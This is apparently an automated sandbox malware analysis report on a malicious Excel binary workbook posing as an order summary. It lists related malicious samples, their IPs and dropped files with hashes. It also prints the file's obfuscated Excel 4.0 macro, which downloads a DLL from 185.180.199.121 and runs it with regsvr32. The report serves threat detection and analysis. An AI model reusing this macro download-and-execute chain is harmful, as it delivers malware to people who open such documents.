                                                                                                                                                    • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, www.bing.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    No simulations

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    185.180.199.121Order_Summary-9632850.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 185.180.199.121/sat1_0609_2.dll
                                                                                                                                                    Total_order_data-V2434883.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 185.180.199.121/sat1_0609_2.dll
                                                                                                                                                    Delivery_Information_7038598.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 185.180.199.121/sat1_0609_2.dll

                                                                                                                                                    Domains

                                                                                                                                                    No context

                                                                                                                                                    ASN

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    HOSTING-SOLUTIONSUSwKZLXCcVCB.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 185.180.199.126
                                                                                                                                                    wKZLXCcVCB.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 185.180.199.126
                                                                                                                                                    INDIV_PAYM_633854-506518488.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 185.180.199.125
                                                                                                                                                    transfer_summ_188108012.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 185.180.199.125
                                                                                                                                                    pmnt_spec_031624191.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 185.180.199.125
                                                                                                                                                    PO187439.exeGet hashmaliciousBrowse
                                                                                                                                                    • 185.162.128.35
                                                                                                                                                    Order_Summary-9632850.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 185.180.199.121
                                                                                                                                                    Total_order_data-V2434883.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 185.180.199.121
                                                                                                                                                    Delivery_Information_7038598.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 185.180.199.121
                                                                                                                                                    W6DkFm55kO.exeGet hashmaliciousBrowse
                                                                                                                                                    • 162.248.225.14
                                                                                                                                                    Lma2EzVvAK.exeGet hashmaliciousBrowse
                                                                                                                                                    • 185.180.198.250
                                                                                                                                                    wEcncyxrEeGet hashmaliciousBrowse
                                                                                                                                                    • 104.193.252.114
                                                                                                                                                    immed_paym_req_44191988.docGet hashmaliciousBrowse
                                                                                                                                                    • 185.159.82.194
                                                                                                                                                    zKOi8vCorq.exeGet hashmaliciousBrowse
                                                                                                                                                    • 185.180.198.99
                                                                                                                                                    invoice_100221.docGet hashmaliciousBrowse
                                                                                                                                                    • 185.180.198.135
                                                                                                                                                    new shippment.xlsxGet hashmaliciousBrowse
                                                                                                                                                    • 185.180.198.135
                                                                                                                                                    w3QgrgNAWs.exeGet hashmaliciousBrowse
                                                                                                                                                    • 185.180.198.99
                                                                                                                                                    yWWZnMPf9D.exeGet hashmaliciousBrowse
                                                                                                                                                    • 185.180.198.99
                                                                                                                                                    zLjBdL6Lbk.exeGet hashmaliciousBrowse
                                                                                                                                                    • 185.180.198.141
                                                                                                                                                    DHL_file094883764773845.exeGet hashmaliciousBrowse
                                                                                                                                                    • 162.244.32.175

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    No context

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\1815CD0B-2738-4D28-B541-12A8E74F2E4F
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):134914
                                                                                                                                                    Entropy (8bit):5.367820976698576
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:NcQIKNgeBXA3gBwlpQ9DQW+z7Y34ZliKWXboOidX5E6LWME9:lEQ9DQW+zvXO1
                                                                                                                                                    MD5:59652EDADBC6E26BDF1B1288616DF0F9
                                                                                                                                                    SHA1:68E427BB05F13BAE8F2F6547212302F15F62301E
                                                                                                                                                    SHA-256:A0C0604D3AEBF53DC7D8F62E689022C1866CC135D11295882B24705A6E9157B0
                                                                                                                                                    SHA-512:FA7B8F7801DA6C99579E9D39F698278FBEBB699FCA4E1DBDAE901123E6C73818ECFD61C036F19B5144102000BAC18DBF9628F7EC474D1B9D9352CFC8CF469CFB
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-23T15:15:20">.. Build: 16.0.14221.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\2835AD15.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 288 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):23989
                                                                                                                                                    Entropy (8bit):7.989754044300238
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:SGjFc9Ll+HCggc/h3GXoQjZVVawDIPsTDGY9R9cNc+3JY0kEtWhfEWa92ppgMoF3:S5plMCgzGoOzVawisTDGY9Rs3JYhEtqy
                                                                                                                                                    MD5:839795652A8FE78F26F4D86D757ABDE8
                                                                                                                                                    SHA1:979E5B90C72EA3E5E9D9B506AFDC981BFCA61B60
                                                                                                                                                    SHA-256:1A9EF0E2F66682B532D15457635920067C4F29EF762D2E8A3E0363B4CF39C13E
                                                                                                                                                    SHA-512:E6D5CB06679832DE768E23EF42B9780E4E8327A057A3EA0A6CD5B76908B210078EF659CA44C8723960AB59A0DB85A052C45E7A29D7FA8A643275BA5F210F6773
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: .PNG........IHDR... ...M.............sRGB.........pHYs..........+....]ZIDATx^.......{fs..|.S........d....`...9.....8..6/.......E.BB.....yw..w.-.FF.g.5~5..ivv.'..U.Tu..8.../=..R9s.Rn....Ry.....@..V.m).bCU..n....Ue.,~b;K.Q.KUlUR.`../...:.Y.Jy..Jy8.Q.K..Xzg..a.Y....X[...s.........`...Q1b....*.......|e.a..$..(...e....e.e..i$SQ.i.y....o.@......p..yx.b.~....Z"..Xc{,..{..o....`...9K..;........=...%.@]? .h!.......W...Z....T.Uul..V..PS[.j.......,..W...T.Z..e..T*.J)..+.K*Wt......W.].K..4......{.<)...V+e....u.I..A...`o..w.....jUU...b...'....EW....R\..'..b......U.X..SKV..O&..?.).....}._....\....*..hU\..W.m.I..|.0\...o..?c.a3'.2}...u....`.9..*....q.dc....!..vq..B...9....&..rsJ.\...)..}.W./.._.g.5e....sy.......@I.l.J.UgW...q..o9^O.g;V.r*v...U.0..._?.5|...x...m..Z....6...._..l.....dc......K..`U.c+;.K.^...`.L....j:W(...fuB=.p..w=..D....q..&..8.V.....UU.b#z...Xyo..X...*...w..U.....sW2...d.u.~.~..)l....e.q.:#r.f.....m|...w_...1.i..bs.F..L.`.}..6V..w.....z
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4D4F51F0.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 178 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):5744
                                                                                                                                                    Entropy (8bit):7.966496386988271
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:4uJgumnoYk22FLjJq17cpKsv+CHI5BXjI1e+HCLDl3kjH1erj+uYU2:4CgJfkfJA7ixCxqe+GDhkT1erj+uYf
                                                                                                                                                    MD5:9AD30E24270C495AE68EAF3A1EEECBFB
                                                                                                                                                    SHA1:8642D256E7FFBEF5804A2D2220A1FE475A99DC36
                                                                                                                                                    SHA-256:6D3EAD431ABD110369EFABC6F2E474DC24FA3D7EEC28DE43456407C5BACD6D20
                                                                                                                                                    SHA-512:EB156DD0686BAAE4F46B0B0C01838DA7225529D3B31912568D36A1CC07BE006EEAD31F464B0252C3A8471ACA71E86EEE9185FE705ABAE08C56B15C63CC891AD5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: .PNG........IHDR.......L.....FpzV....sRGB.........pHYs..........+......IDATx^.\.tTU..u...@@. .b..su....."....+k..Aeu..rX.*.feE..(M.....b..BB.P.f&S_.~w&.I.aH...'...0..........u.2.!...`....8_..,.T.#....,.X...N....NN-l........5`...Z.,..-L..k.":9..Y.,Z..c.Etrja..X.0.G.......f..ha...]......2`.......,..S..e...)<:v.XD'..6.E.Sxt....NN-l........5`...Z.,..-L..k.":9..Yt......9.{.f;...f../Mh...B..GK.....FG.....s...MN.vqp"+.|.m[&11..<O....?...EQ4.H...Z'M... #.T......vS..^..p..)........1...JJr?.gq.V..X..h..T._Zr2g..W^...A./.W...P....q.By.49..5M--.e...5}..{.!.s4M./Xx2.....`...I>s..4U...]...(5.8o>.X.[..xS.w)../.c.Lh..a..uQ.fd.....jh.Z.d..(..=.....#.....o.y....g...-....=?..X.f./..=n|`.j..k.........{.4...b..T.-h..F..;u.x....[!.\....*'Nx^....C..b...8........|F.$.4.......&?.>#.d.\p.R..k..>t0?.-3g..b......s.O..E...4o...\O=.7O=z...u1$n..6..C.]A.X...Z.tX.......I..W.....P...h.@..+q..F.kcI..x\>.....0.4..p....}.~e...).w....%Q.$W......8........PY.k..J....T..b.l
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\54BD2812.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 168 x 72, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):6177
                                                                                                                                                    Entropy (8bit):7.959095006853368
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:j6KDvZ3QXkQ288GMDBm6hEeWyS8ITRIVg9gPEnbYhbY0Y4pxCpAueydMT1uZMr0a:j6KTV8WBPhqd9qqYTB6peyeT1oMr0a
                                                                                                                                                    MD5:C7ED6FC355D8632DB1464BE3D56BF5CC
                                                                                                                                                    SHA1:615484A338922DDF00B903CFA48060AD60D70207
                                                                                                                                                    SHA-256:26000244FBB0C6B2D76F80166CE85700BC96141C6CD80F8B399CA6F15FE3515C
                                                                                                                                                    SHA-512:FB4AE09EACD15A4FE778BDF366808C4F9FE403C4054F86704C03C87C7016E7D7A5772677B69064FCB5F1B9345D80C4263A58EA8B5E9CA2B717E24E2B19B85A92
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: .PNG........IHDR.......H......m)a....sRGB.........pHYs..........+......IDATx^....E...1.Y. ..."3.(.D......A..(....(.C.X.QP..b.UQAdA..9'I:Hf..f.....s....._.A..s.3...Vu........Z.[.q.P.-9.b..q.......|.r F......c..1..........e.->....@..;n.q..(.bt.q...>F9...[|\.1..]v..A..G..y._3...*3M.YG7.J.)..RK]u.j}.*^J.....R...j.:=}..qN .sV&..F.a.@..Vs.P...%.A......~..w..P.Be.-].4..arss.9~.8d.@.d...."..?.G....z............(.T.......G.;w.?....w....S.H.+...W.^..........E..-_.|....D-....#G.{..<r....P.K..$.{D....kzzz.R....`?..O;........#....tb..g..gU.r>G.......:t........a........p..c..]......M.6.'O.]......8q...RSS.YBB.M.j..}..I.&.:%J.x..7o....d.*U..233.].......E.m}..../^..nt..X.b,..{<....=.....3....z....v..]0.e.}...?.....w..y...)S.L.F.:t..U...+F...l......&...322.6m.../.[.J.a.=..%Kx....E...ys.....z...i.z..g...G...e.7.|.h....!C^x.5k"......<.R..k....4iR.V-.._.~....:..P.O@.y.:..:G=.\...J ...u...]%.T.n.......v..A`Y.......V...^{.X^.I`1w.q........
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\881CC931.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):956
                                                                                                                                                    Entropy (8bit):7.683552542542939
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:64ZJH5wka2YQydYiFNcincNrtNmt5xx4tRFB:JJH5fYuW5c3wPoFB
                                                                                                                                                    MD5:32C83607A5C98C5A634278E5AED3AD61
                                                                                                                                                    SHA1:EDE34ADEA53C413C4AC8215EA48F2F2FD59F1362
                                                                                                                                                    SHA-256:4A999E919D85EDD0CD1A772CA3B29F91AEECF77D0BEB11FD1B632B7A8A0686BF
                                                                                                                                                    SHA-512:AF19A013377F0F7B47E54D99D0AFA222BE46072C47944E8640B09A4993DFDDC906B7C68F7E3DAB5B3F126C9AD1090EADBF17FF7068EE8E360D0EA46811C0DB3C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .PNG........IHDR.............;0......sRGB.........gAMA......a.....pHYs..........o.d...QIDATHK.VMHTQ..2.h.X."h....A....]B...m.(h..b?.$...f.)..ta...jS..!..h.ETD.!."."C..y.....=.>8...{.s..32.0Fv.F...kz..&.|_......9.)m."......m..$9.j...E.@.:D.-..0...L.hk..(....s.'.k.A-.-......(.....jR[m..d..O.-?:.c..70.{..sw'X.j.^j+..d....N.. .r......Z.[[[..c...r.../.M`l.]&#.aR..[{...<O....<d...3....F...:..s9..-...x..R...q..ON.KO;..0..^.....9.S.}..x...22......r..f....'......+o...A..7......q..l...S........s/.{.^..Pj1`.b.!t..>o..!.C.e.}....Y.....t.......r.MDq=.=..._....c..3%p...j...hI1.[.^.#..."#...e...6..I-j;.9j;o/...Q2...w-.?.<..r../?...0.`.;.lz.M...\. ..]x...\h^.....r..';... ...<..j..E._.E..u..g....7.X....T....7........(&.[....... T....;V1w..,EU.W"./.........m%.u'x/.u]*....@.-.L..G.....Q."..%fb.Z*.,...K.%BX....]`J=.h".Vef...2..8.g.jX.2s..vY.u|.4p.\.h...W....(.r.....^Y....2$8F...>`p._.c..}.txq#.$.`:@...Y..?.j.IK.Fu....IEND.B`.
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\955434EB.png
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:PNG image data, 264 x 113, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):9924
                                                                                                                                                    Entropy (8bit):7.973758306371751
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:soXrzGktAQUkDfw4om9PEK9u27pwnJyV028/tgXEoCWoB:so9G+fnVEYu27OIW/+XEoCWoB
                                                                                                                                                    MD5:B34FB4F2F0F9E70B72BA3AFD028CD97C
                                                                                                                                                    SHA1:C6868336F78DEA1E718965DF3341039581DB5B5A
                                                                                                                                                    SHA-256:189D420D344A694FD1928ABACBEC94D9F0EF52BE036CEB8144A9D9A6DD14EAEB
                                                                                                                                                    SHA-512:4795600917F8A67A6C5CBD5713CAACE74E0483F8E6BB6D98EAB63BF24A0F71E537E7F8ABD26808630B247D454A3F467595C8343EEB4EA98AFAB49D81964158D6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: .PNG........IHDR.......q............sRGB.........pHYs..........+....&iIDATx^.Wp.G~.{"r.. H.9s.,Q.v........\..../wu..t.o..ru...+W]....vWa).Q.b&.@d.D.q....{0....GB....8...........X,&L1.0...........b...0Xa ....a..0.0.ap.@......'.*. `.#.6.,....aX..i.b.0..b.n.k...0...J1...H..7...C...dZ....a....Z..!.kp2.R...0Rl..r.A...58.V)..C.)..f.. `....L....!...p.\k.0.a.N.U.A..F.m.Y.5....'.*. `.#.6.,....aX..i.b.0..b.n.k...0...J1...H..7...C...dZ....a....Z..!.kp2.R...0Rl..r.A...58.V)..C.)..f.. `....L....!...p.\k.0.a.N.U.A..F.m.Y.5....'.*. ..W[....cfTDC.....V.....W`...Q!.JEaE....5O.{\N.p8b.5.#*.t......^...p..A.+.0cC..(.v.,.............qO....-b.0.#l.......p...w...sN]m..-c.=....L....I..T...I.3....]...r.....Ae.H%..!......O...?-.I..".4...........p...{..0..#,..........%4.;E....w..]......ga...X....#...h@.'E.'.|...I.a..J..V...!...E..?8[CQ?.'...5Qy........X..)Y..ic 0....!..Gf..4...o.R../.^..y2.'..p.....KO..v.T....~.......-]"..u9Q..i..^e..!.i".^.......C.CKV..~Ku.4"m.$>cKP...x...7
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\0CB40000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):80025
                                                                                                                                                    Entropy (8bit):7.896060743310021
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:zZMVmEKjBX9U8fWGHzDmf5TOlMVGoIahaDHTU6hryF70KiiAeWR:empX9U8fW2XmfU2sTU2yF70KiiW
                                                                                                                                                    MD5:4E14AE8B3DDDB0449E20FA26C7934DFB
                                                                                                                                                    SHA1:AD46975613DAA412CD5555AFCAEFE552E39CB154
                                                                                                                                                    SHA-256:F567AF0905B7ADF15ABBC2365C022203D5D2D5A64BCF81F0BFD2A91B46A4C41A
                                                                                                                                                    SHA-512:10EB07D041FBDD251D92055721EE1EEBEF51C025E3890A7FE8E74CEF60419403D739D1A7C6DBD33BEA6F60FD36C29A0ED43D62B4C71FDB9D72AE28B2952319E7
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: .U.N.0.._....E...t.....$..\{.X.K.....[z..AT6y9.1g...jaM....w-;kF..'..k...]..U..S.x.-[.......2.V.v.>.p.9......p.2..D...A...F.\z...:e.6...L..T.....Ip...W.e..i...9..j..!B0Z.D..7....l.%(/_-.i0D..{.dM..&...R.(p.f...D.94.,...O)...y.k...Z....Q+..EL..RZ|a......f?I..b....).7V..o....5...=J.....~ ..#..\I!>...jdS...P..!..X&.n.^...Zh..ii...w+.C.........|.>.CE.-.........z.> .......).]."..4l..-.Q.art.!Om.j.6/...?.......PK..........!.........f.......[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):22
                                                                                                                                                    Entropy (8bit):2.9808259362290785
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                    MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                    SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                    SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                    SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                    C:\Users\user\Desktop\~$Total_order_details_1231333.xlsb
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):165
                                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                    MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                    SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                    SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                    SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                                    Entropy (8bit):7.870422721255186
                                                                                                                                                    TrID:
                                                                                                                                                    • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                    • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                    File name:Total_order_details_1231333.xlsb
                                                                                                                                                    File size:64436
                                                                                                                                                    MD5:7a915d04a60c318f37d2586b02587a26
                                                                                                                                                    SHA1:695dc190cd70d39a16a003400581353065f964af
                                                                                                                                                    SHA256:d8c12fb3fc8f75b90c2a11a84b190c7fb3736f08c78a45ab336bacd39f19d3b9
                                                                                                                                                    SHA512:fe910bca6f0542d3d0c8933f927dd992c488d5e5214f8853763f43cf6bfa97b0e1b971b9eb53a65b64db0b6a572c8a1bed943d78a7054b020f13b9a4b966768d
                                                                                                                                                    SSDEEP:1536:uj3yHgwWlMVGoIahaDHTU6hryF70liWWGH0AeWj:uj3y02sTU2yF70liWW20a
                                                                                                                                                    File Content Preview:PK..........!.L.......>.......[Content_Types].xml ...(...........................................................................................................''............................................................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OpenXML
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "Total_order_details_1231333.xlsb"

                                                                                                                                                    Indicators

                                                                                                                                                    Has Summary Info:
                                                                                                                                                    Application Name:
                                                                                                                                                    Encrypted Document:
                                                                                                                                                    Contains Word Document Stream:
                                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:

                                                                                                                                                    Macro 4.0 Code

                                                                                                                                                    CALL(U, Sheet2!AV21&Sheet2!BM28&Sheet2!BK33&Sheet2!AX14, Sheet2!BJ54&Sheet2!BK54&Sheet2!BL54&BD46&BE46&BF46, 0, ht, ..\kdldyeff.dll, 0, 0)
                                                                                                                                                    
                                                                                                                                                    "=CALL(BQ18&Sheet2!BK50&Sheet2!BL50&BD42&BE44&BF44,Sheet2!AV21&Sheet2!BM28&Sheet2!BK33&Sheet2!AX14,Sheet2!BJ54&Sheet2!BK54&Sheet2!BL54&BD46&BE46&BF46,0,BH28&BH29&BH30&BH31,BH41,0,0)",,,,,,,,,,,,,,,,,,,,,,=Sheet2!BA14(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,U,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ht,,,,,,,,,,,,,,,,,,,,,,tp://,,,,,,,,,,,,,,,,,,,,,,185.180.199.121/sat1_0609_2.,,,,,,,,,,,,,,,,,,,,,,dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\kdldyeff.dll,,,,,,,,,,,,,,,,,,M,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,C,B,B,,,,,,,,,,,
                                                                                                                                                    ,,FileA,,,,,,,,,,,,,,,,,,,,=EXEC(before.3.13.47.sheet!BG59&before.3.13.47.sheet!BG60&before.3.13.47.sheet!BF23&Sheet1!BH41),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,"=RIGHT(""FDFGFDhfjhjhfjfgjUR"",2)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""2 -s """,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,LDownlo,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,adTo,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,R,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,J,J,C,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,regs,,,,,,,,,,,,,,,,,vr3,,,,,,

                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
